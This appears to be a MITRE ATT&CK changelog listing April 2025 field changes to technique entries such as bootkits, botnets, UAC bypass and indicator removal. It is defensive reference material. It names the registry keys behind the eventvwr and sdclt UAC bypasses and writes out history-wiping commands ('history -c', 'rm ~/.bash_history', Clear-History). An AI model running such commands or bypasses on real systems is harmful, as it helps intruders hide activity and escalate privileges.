| external_references | | {'source_name': 'WSJ-Vishing-AI24', 'description': 'Catherine Stupp. (2019, August 30). Fraudsters Used AI to Mimic CEO’s Voice in Unusual Cybercrime Case. Retrieved March 18, 2025.', 'url': 'https://www.wsj.com/articles/fraudsters-use-ai-to-mimic-ceos-voice-in-unusual-cybercrime-case-11567157402'} |
| external_references | | {'source_name': 'Google-Vishing24', 'description': 'Emily Astranova, Pascal Issa. (2024, July 23). Whose Voice Is It Anyway? AI-Powered Voice Spoofing for Next-Gen Vishing Attacks. Retrieved March 18, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/ai-powered-voice-spoofing-vishing-attacks'} |
| external_references | | {'source_name': 'IC3-AI24', 'description': 'IC3. (2024, December 3). Criminals Use Generative Artificial Intelligence to Facilitate Financial Fraud. Retrieved March 18, 2025.', 'url': 'https://www.ic3.gov/PSA/2024/PSA241203'} |
[T1573.002] Encrypted Channel: Asymmetric Cryptography
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-12-26 20:59:21.941000+00:00 | 2025-04-15 19:59:03.664000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1055.004] Process Injection: Asynchronous Procedure Call
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application control', 'Anti-virus'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 12:23:46.476000+00:00 | 2025-04-15 19:58:44.390000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1053.002] Scheduled Task/Job: At
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
| x_mitre_remote_support | True | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-12 15:53:12.333000+00:00 | 2025-04-15 19:59:21.266000+00:00 |
| x_mitre_version | 2.3 | 2.4 |
[T1547.002] Boot or Logon Autostart Execution: Authentication Package
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 16:29:36.291000+00:00 | 2025-04-16 20:37:19.684000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.0 | 1.1 |
[T1059.010] Command and Scripting Interpreter: AutoHotKey & AutoIT
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_remote_support | False | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-28 15:58:48.119000+00:00 | 2025-04-15 19:58:23.600000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1119] Automated Collection
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_system_requirements | ['Permissions to access directories, files, and API endpoints that store information of interest.'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-25 20:40:07.791000+00:00 | 2025-04-15 19:58:18.743000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
[T1020] Automated Exfiltration
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-24 00:04:01.066000+00:00 | 2025-04-15 19:58:42.569000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1197] BITS Jobs
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Firewall', 'Host forensic analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 12:21:40.927000+00:00 | 2025-04-16 20:37:20.513000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 1.5 |
[T1102.002] Web Service: Bidirectional Communication
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-26 23:15:47.861000+00:00 | 2025-04-15 19:59:03.009000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1027.001] Obfuscated Files or Information: Binary Padding
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Signature-based detection'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:53.857000+00:00 | 2025-04-16 20:37:17.215000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1547] Boot or Logon Autostart Execution
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:27:58.051000+00:00 | 2025-04-15 19:58:12.270000+00:00 |
| external_references[1]['description'] | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | https://web.archive.org/web/20160214140250/http://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order |
| x_mitre_version | 1.2 | 1.3 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1037] Boot or Logon Initialization Scripts
Current version: 2.4
Version changed from: 2.3 → 2.4
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:23:13.621000+00:00 | 2025-04-15 19:58:02.121000+00:00 |
| x_mitre_version | 2.3 | 2.4 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1542.003] Pre-OS Boot: Bootkit
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may use bootkits to persist on systems. Bootkits | t | Adversaries may use bootkits to persist on systems. A bootki |
| reside at a layer below the operating system and may make i | | t is a malware variant that modifies the boot sectors of a h |
| t difficult to perform full remediation unless an organizati | | ard drive, allowing malicious code to execute before a compu |
| on suspects one was used and can act accordingly. A bootkit | | ter's operating system has loaded. Bootkits reside at a laye |
| is a malware variant that modifies the boot sectors of a ha | | r below the operating system and may make it difficult to pe |
| rd drive, including the Master Boot Record (MBR) and Volume | | rform full remediation unless an organization suspects one w |
| Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MB | | as used and can act accordingly. In BIOS systems, a bootkit |
| R is the section of disk that is first loaded after completi | | may modify the Master Boot Record (MBR) and/or Volume Boot |
| ng hardware initialization by the BIOS. It is the location o | | Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is t |
| f the boot loader. An adversary who has raw access to the bo | | he section of disk that is first loaded after completing har |
| ot drive may overwrite this area, diverting execution during | | dware initialization by the BIOS. It is the location of the |
| startup from the normal boot loader to adversary code. (Cit | | boot loader. An adversary who has raw access to the boot dri |
| ation: Lau 2011) The MBR passes control of the boot process | | ve may overwrite this area, diverting execution during start |
| to the VBR. Similar to the case of MBR, an adversary who ha | | up from the normal boot loader to adversary code.(Citation: |
| s raw access to the boot drive may overwrite the VBR to dive | | Lau 2011) The MBR passes control of the boot process to the |
| rt execution during startup to adversary code. | | VBR. Similar to the case of MBR, an adversary who has raw a |
| | | ccess to the boot drive may overwrite the VBR to divert exec |
| | | ution during startup to adversary code. In UEFI (Unified Ex |
| | | tensible Firmware Interface) systems, a bootkit may instead |
| | | create or modify files in the EFI system partition (ESP). Th |
| | | e ESP is a partition on data storage used by devices contain |
| | | ing UEFI that allows the system to boot the OS and other uti |
| | | lities used by the system. An adversary can use the newly cr |
| | | eated or patched files in the ESP to run malicious kernel co |
| | | de.(Citation: Microsoft Security)(Citation: welivesecurity) |
New Detections:
- DS0022: File (File Creation)
- DS0022: File (File Modification)
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host intrusion prevention systems', 'Anti-virus', 'File monitoring'] | |
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:47.417000+00:00 | 2025-04-15 19:58:10.739000+00:00 |
| description | Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. | Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR).(Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code.(Citation: Lau 2011)
The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.
In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.(Citation: Microsoft Security)(Citation: welivesecurity) |
| external_references[1]['description'] | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019. | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf | https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'welivesecurity', 'description': 'Martin Smolár. (2023, March 1). BlackLotus UEFI bootkit: Myth confirmed. Retrieved February 11, 2025.', 'url': 'https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/'} |
| external_references | | {'source_name': 'Microsoft Security', 'description': 'Microsoft Incident Response. (2023, April 11). Guidance for investigating attacks using CVE-2022-21894: The BlackLotus campaign. Retrieved February 12, 2025.', 'url': 'https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/'} |
| x_mitre_data_sources | | File: File Creation |
| x_mitre_data_sources | | File: File Modification |
[T1583.005] Acquire Infrastructure: Botnet
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Adversaries may buy, lease, or rent a network of compromised | t | Adversaries may buy, lease, or rent a network of compromised |
| systems that can be used during targeting. A botnet is a ne | | systems that can be used during targeting. A botnet is a ne |
| twork of compromised systems that can be instructed to perfo | | twork of compromised systems that can be instructed to perfo |
| rm coordinated tasks.(Citation: Norton Botnet) Adversaries m | | rm coordinated tasks.(Citation: Norton Botnet) Adversaries m |
| ay purchase a subscription to use an existing botnet from a | | ay purchase a subscription to use an existing botnet from a |
| booter/stresser service. With a botnet at their disposal, ad | | booter/stresser service. Internet-facing edge devices and |
| versaries may perform follow-on activity such as large-scale | | related network appliances that are end-of-life (EOL) and un |
| [Phishing](https://attack.mitre.org/techniques/T1566) or Di | | supported by their manufacturers are commonly acquired for b |
| stributed Denial of Service (DDoS).(Citation: Imperva DDoS f | | otnet activities. Adversaries may lease operational relay bo |
| or Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citat | | x (ORB) networks – consisting of virtual private servers (VP |
| ion: Krebs-Booter) | | S), small office/home office (SOHO) routers, or Internet of |
| | | Things (IoT) devices – to serve as a botnet.(Citation: ORB M |
| | | andiant) With a botnet at their disposal, adversaries may |
| | | perform follow-on activity such as large-scale [Phishing](ht |
| | | tps://attack.mitre.org/techniques/T1566) or Distributed Deni |
| | | al of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citat |
| | | ion: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Boo |
| | | ter) Acquired botnets may also be used to support Command an |
| | | d Control activity, such as [Hide Infrastructure](https://at |
| | | tack.mitre.org/techniques/T1665) through an established [Pro |
| | | xy](https://attack.mitre.org/techniques/T1090) network. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-15 02:49:14.664000+00:00 | 2025-04-16 13:29:34.161000+00:00 |
| description | Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter) | Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service.
Internet-facing edge devices and related network appliances that are end-of-life (EOL) and unsupported by their manufacturers are commonly acquired for botnet activities. Adversaries may lease operational relay box (ORB) networks – consisting of virtual private servers (VPS), small office/home office (SOHO) routers, or Internet of Things (IoT) devices – to serve as a botnet.(Citation: ORB Mandiant)
With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter) Acquired botnets may also be used to support Command and Control activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) network.
|
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'ORB Mandiant', 'description': 'Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved July 8, 2024.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks'} |
[T1185] Browser Session Hijacking
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-02-25 18:58:15.229000+00:00 | 2025-04-15 19:58:32.147000+00:00 |
| x_mitre_version | 2.0 | 2.1 |
[T1110] Brute Force
Current version: 2.7
Version changed from: 2.6 → 2.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:56.556000+00:00 |
| x_mitre_version | 2.6 | 2.7 |
| x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Windows User Account Control'] | |
| x_mitre_effective_permissions | ['Administrator'] | |
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21 12:35:39.112000+00:00 | 2025-04-16 20:37:15.662000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_detection | There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes. | There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes.
Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. For example:
* The eventvwr.exe bypass uses the [HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command Registry key.(Citation: enigma0x3 Fileless UAC Bypass)
* The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass)
Analysts should monitor these Registry settings for unauthorized changes. |
| x_mitre_version | 2.1 | 2.2 |
[T1218.003] System Binary Proxy Execution: CMSTP
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:35:43.077000+00:00 | 2025-04-15 19:58:29.296000+00:00 |
| external_references[5]['description'] | Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved August 6, 2018. | Seetharaman, N. (2018, July 7). Detecting CMSTP-Enabled Code Execution and UAC Bypass With Sysmon.. Retrieved November 17, 2024. |
| external_references[5]['url'] | http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ | https://web.archive.org/web/20190316220149/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ |
| x_mitre_version | 2.1 | 2.2 |
[T1574.012] Hijack Execution Flow: COR_PROFILER
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-30 21:35:12.049000+00:00 | 2025-04-15 19:59:25.301000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1546.001] Event Triggered Execution: Change Default File Association
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 15:27:11.065000+00:00 | 2025-04-15 19:58:52.605000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1070.003] Indicator Removal: Clear Command History
Current version: 1.6
Version changed from: 1.5 → 1.6
|
|
|---|
| t | In addition to clearing system logs, an adversary may clear | t | In addition to clearing system logs, an adversary may clear |
| the command history of a compromised account to conceal the | | the command history of a compromised account to conceal the |
| actions undertaken during an intrusion. Various command inte | | actions undertaken during an intrusion. Various command inte |
| rpreters keep track of the commands users type in their term | | rpreters keep track of the commands users type in their term |
| inal so that users can retrace what they've done. On Linux | | inal so that users can retrace what they've done. On Linux |
| and macOS, these command histories can be accessed in a few | | and macOS, these command histories can be accessed in a few |
| different ways. While logged in, this command history is tra | | different ways. While logged in, this command history is tra |
| cked in a file pointed to by the environment variable <code> | | cked in a file pointed to by the environment variable <code> |
| HISTFILE</code>. When a user logs off a system, this informa | | HISTFILE</code>. When a user logs off a system, this informa |
| tion is flushed to a file in the user's home directory calle | | tion is flushed to a file in the user's home directory calle |
| d <code>~/.bash_history</code>. The benefit of this is that | | d <code>~/.bash_history</code>. The benefit of this is that |
| it allows users to go back to commands they've used before i | | it allows users to go back to commands they've used before i |
| n different sessions. Adversaries may delete their commands | | n different sessions. Adversaries may delete their commands |
| from these logs by manually clearing the history (<code>his | | from these logs by manually clearing the history (<code>hist |
| tory -c</code>) or deleting the bash history file <code>rm ~ | | ory -c</code>) or deleting the bash history file <code>rm ~/ |
| /.bash_history</code>. Adversaries may also leverage a [N | | .bash_history</code>. Adversaries may also leverage a [Ne |
| etwork Device CLI](https://attack.mitre.org/techniques/T1059 | | twork Device CLI](https://attack.mitre.org/techniques/T1059/ |
| /008) on network devices to clear command history data (<cod | | 008) on network devices to clear command history data (<code |
| e>clear logging</code> and/or <code>clear history</code>).(C | | >clear logging</code> and/or <code>clear history</code>).(Ci |
| itation: US-CERT-TA18-106A) On Windows hosts, PowerShell ha | | tation: US-CERT-TA18-106A) On ESXi servers, command history |
| s two different command history providers: the built-in hist | | may be manually removed from the `/var/log/shell.log` file.( |
| ory and the command history managed by the <code>PSReadLine< | | Citation: Broadcom ESXi Shell Audit) On Windows hosts, Powe |
| /code> module. The built-in history only tracks the commands | | rShell has two different command history providers: the buil |
| used in the current session. This command history is not av | | t-in history and the command history managed by the <code>PS |
| ailable to other sessions and is deleted when the session en | | ReadLine</code> module. The built-in history only tracks the |
| ds. The <code>PSReadLine</code> command history tracks the | | commands used in the current session. This command history |
| commands used in all PowerShell sessions and writes them to | | is not available to other sessions and is deleted when the s |
| a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSRe | | ession ends. The <code>PSReadLine</code> command history tr |
| adLine\ConsoleHost_history.txt</code> by default). This hist | | acks the commands used in all PowerShell sessions and writes |
| ory file is available to all sessions and contains all past | | them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerS |
| history since the file is not deleted when the session ends. | | hell\PSReadLine\ConsoleHost_history.txt</code> by default). |
| (Citation: Microsoft PowerShell Command History) Adversarie | | This history file is available to all sessions and contains |
| s may run the PowerShell command <code>Clear-History</code> | | all past history since the file is not deleted when the sess |
| to flush the entire command history from a current PowerShel | | ion ends.(Citation: Microsoft PowerShell Command History) A |
| l session. This, however, will not delete/flush the <code>Co | | dversaries may run the PowerShell command <code>Clear-Histor |
| nsoleHost_history.txt</code> file. Adversaries may also dele | | y</code> to flush the entire command history from a current |
| te the <code>ConsoleHost_history.txt</code> file or edit its | | PowerShell session. This, however, will not delete/flush the |
| contents to hide PowerShell commands they have run.(Citatio | | <code>ConsoleHost_history.txt</code> file. Adversaries may |
| n: Sophos PowerShell command audit)(Citation: Sophos PowerSh | | also delete the <code>ConsoleHost_history.txt</code> file or |
| ell Command History Forensics) | | edit its contents to hide PowerShell commands they have run |
| | | .(Citation: Sophos PowerShell command audit)(Citation: Sopho |
| | | s PowerShell Command History Forensics) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host forensic analysis', 'Log analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-02-14 20:07:44.756000+00:00 | 2025-04-15 19:58:23.774000+00:00 |
| description | In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) | In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history.
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (clear logging and/or clear history).(Citation: US-CERT-TA18-106A) On ESXi servers, command history may be manually removed from the `/var/log/shell.log` file.(Citation: Broadcom ESXi Shell Audit)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics) |
| external_references[4]['description'] | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved September 4, 2020. | Vikas, S. (2020, August 26). PowerShell Command History Forensics. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics | https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics |
| x_mitre_version | 1.5 | 1.6 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Broadcom ESXi Shell Audit', 'description': 'Broadcom. (2025, February 20). Auditing ESXi Shell logins and commands. Retrieved March 26, 2025.', 'url': 'https://knowledge.broadcom.com/external/article/321910/auditing-esxi-shell-logins-and-commands.html'} |
| x_mitre_platforms | | ESXi |
[T1070.007] Indicator Removal: Clear Network Connection History and Configurations
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-09-08 18:05:28.311000+00:00 | 2025-04-16 20:37:16.734000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1070.009] Indicator Removal: Clear Persistence
